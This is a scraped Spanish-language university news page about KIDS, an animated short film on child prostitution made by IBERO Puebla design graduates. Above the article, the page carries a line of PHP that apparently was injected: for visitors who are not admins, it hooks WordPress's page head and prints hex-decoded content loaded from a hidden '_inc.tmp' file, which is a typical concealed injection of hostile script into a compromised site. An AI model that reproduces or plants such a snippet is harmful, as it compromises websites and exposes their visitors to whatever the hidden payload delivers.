if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } KIDS, CORTOMETRAJE CRUDO DE UNA REALIDAD INFANTIL – La Opinión Universitaria La Opinión Universitaria
Menu

KIDS, CORTOMETRAJE CRUDO DE UNA REALIDAD INFANTIL

 

+ Animación con compromiso social

 

En menos de dos minutos, el cortometraje animado KIDS trae a primer plano un tema tabú y azota al espectador con la crudeza de su cotidianidad. Porque así se suscitan los crímenes silenciosos: de manera sistemática, rapaz y con consecuencias que marcan de por vida a las víctimas.

 

La prostitución infantil está presente en el día a día. A veces, su presencia es tan flagrante y descarada que, paradójicamente, es invisible. Para Sebastián Castillo, egresado de la Licenciatura en Diseño de Interacción y Animación de la IBERO Puebla, obviamos este tema por incomodidad y por la impotencia que genera la inacción.

 

El director y guionista del proyecto tuvo el primer acercamiento con la temática en una de las asignaturas correspondientes al Área de Reflexión Universitaria (ARU), eje insignia de la formación jesuita. El proceso de sensibilización que experimentó lo llevó a conectar sus reflexiones con la convocatoria lanzada por la organización Impunidad Cero para realizadores audiovisuales.

 

En cuestión de dos meses, Sebastián y Daniela Leal, también egresada de Diseño, conformaron un equipo de trabajo para crear KIDS. En un inicio, se contempló a ocho de sus amigos de la carrera. Debido a los compromisos de cada uno, el equipo se extendió a 25 personas que colaboraron de manera voluntaria, entre los que se encontraban artistas y diseñadores de Estados Unidos.

 

Como productora del proyecto, Daniela reclutó y coordinó a los talentos. Si bien la preproducción tuvo complicaciones derivadas del trabajo a distancia, las etapas subsecuentes se vieron beneficiadas de este contexto. Explica la diseñadora: “Recurrimos a grupos como Rise Up Animation y a la Industria de la Animación en México para lanzar la convocatoria y conseguir el apoyo de varios voluntarios”.

 

Tras concluir el audiovisual, Sebastián reconoció el impacto emocional de la temática: “cuando realicé el primer ensamble se me destrozó el corazón. Le hablé a Daniela y le dije ‘creo que tenemos algo muy bueno entre manos’”. Este impacto lo adjudica, entre otras cosas, a la técnica: la animación logra hacer que todos los elementos se concatenen para generar empatía en el espectador.

 

Los realizadores se suman a una serie de testimonios de alumnos de Diseño de Interacción y Animación de la IBERO Puebla que han recibido distinciones nacionales e internacionales por parte de instancias como Diseña MX y la UNESCO.

traje animado KIDS se encuentra disponible en la siguiente liga:

Kids

 

Tweets recientes